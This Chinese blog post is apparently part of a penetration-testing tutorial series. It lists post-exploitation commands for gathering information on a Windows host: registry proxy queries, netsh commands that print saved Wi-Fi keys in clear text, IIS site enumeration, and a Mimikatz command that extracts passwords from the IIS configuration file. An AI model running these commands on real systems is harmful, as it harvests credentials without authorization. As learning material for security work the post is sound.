前言
作者简介:不知名白帽,网络安全学习者。
博客主页:https://blog.csdn.net/m0_63127854?type=blog
内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html
目录
内网渗透之Windows反弹shell(一)_不知名白帽的博客-CSDN博客
本地信息收集
01IE浏览器代理信息查看
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
02Windows Wifi密码获取
netsh wlan show profile
netsh wlan show profile name="ssid" KEY=clear
03Windows hosts config
windows7/windows2008/windows10等:
C:\Windows\System32\drivers\etc\hosts
Windows2003:
C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
04Windows IIS config
IIS6:
cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/root
IIS7,8:
列出网站列表:%systemroot%/system32/inetsrv/appcmd.exe list site
列出网站物理路径:%systemroot%\system32\inetsrc\appcmd.exe list vdir
Mimikatz读取IIS7配置文件密码:
mimikatz.exe privilege::debug log "iis::apphost
/in:"%systemroot%\system32\inetsrv\config\applicationHost.config" /live" exit
05Windows回收站信息获取
目录路径在C:\%Recycle.Bin
$I开头的文件保存的是路径信息
$R开头的文件保存的是文件内容